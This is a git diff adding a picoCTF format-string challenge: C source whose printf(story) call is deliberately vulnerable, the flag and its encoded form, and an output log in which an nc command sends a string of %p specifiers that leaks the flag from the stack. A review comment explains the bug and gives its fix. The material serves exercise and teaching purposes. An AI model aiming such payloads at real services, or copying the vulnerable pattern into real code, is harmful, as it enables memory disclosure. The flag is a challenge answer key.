diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt
new file mode 100644
index 0000000..d98d0c0
--- /dev/null
+++ b/pwn/flag_leak/flag.txt
@@ -0,0 +1,5 @@
+# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
+#
+# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
+
+picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}
diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt
new file mode 100644
index 0000000..f5f3e94
--- /dev/null
+++ b/pwn/flag_leak/output.txt
@@ -0,0 +1,3 @@
+$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
+Tell me a story and then I'll tell you one >> Here's a story - 
+0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5
diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln
new file mode 100755
index 0000000..666c7d1
Binary files /dev/null and b/pwn/flag_leak/vuln differ
diff --git a/pwn/flag_leak/vuln.c b/pwn/flag_leak/vuln.c
new file mode 100644
index 0000000..ca0491a
--- /dev/null
+++ b/pwn/flag_leak/vuln.c
@@ -0,0 +1,46 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+ char flag[BUFSIZE];
+ char story[128];
+
+ readflag(flag, FLAGSIZE);
+
+ printf("Tell me a story and then I'll tell you one >> ");
+ scanf("%127s", story);
+ printf("Here's a story - \n");
+ printf(story);
+ printf("\n");
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ // Set the gid to the effective gid
+ // this prevents /bin/sh from dropping the privileges
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ vuln();
+ return 0;
+}
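Review bot: `printf(story);` in vuln() passes the buffer that `scanf("%127s", story)` just filled from the user as the format string, so any `%` conversions in the input are interpreted by printf (CWE-134); the safe form is `printf("%s", story);` or `fputs(story, stdout);`, and `-Wformat-security` reports the current call at compile time. If the call is meant to stay as the challenge's intended weakness, a one-line marker such as `// intentionally vulnerable: user-controlled format string` would keep a later reader from treating it as an oversight. In readflag(), the return value of `fgets` is ignored and the FILE returned by `fopen` is never closed; `if (fgets(buf, len, f) == NULL) buf[0] = '\0'; fclose(f);` covers an empty flag.txt and releases the handle before returning. The seven `#include` lines in the hunk show no header names, presumably stripped during rendering, since the code relies on `printf`, `fopen`, `size_t` and `getegid`.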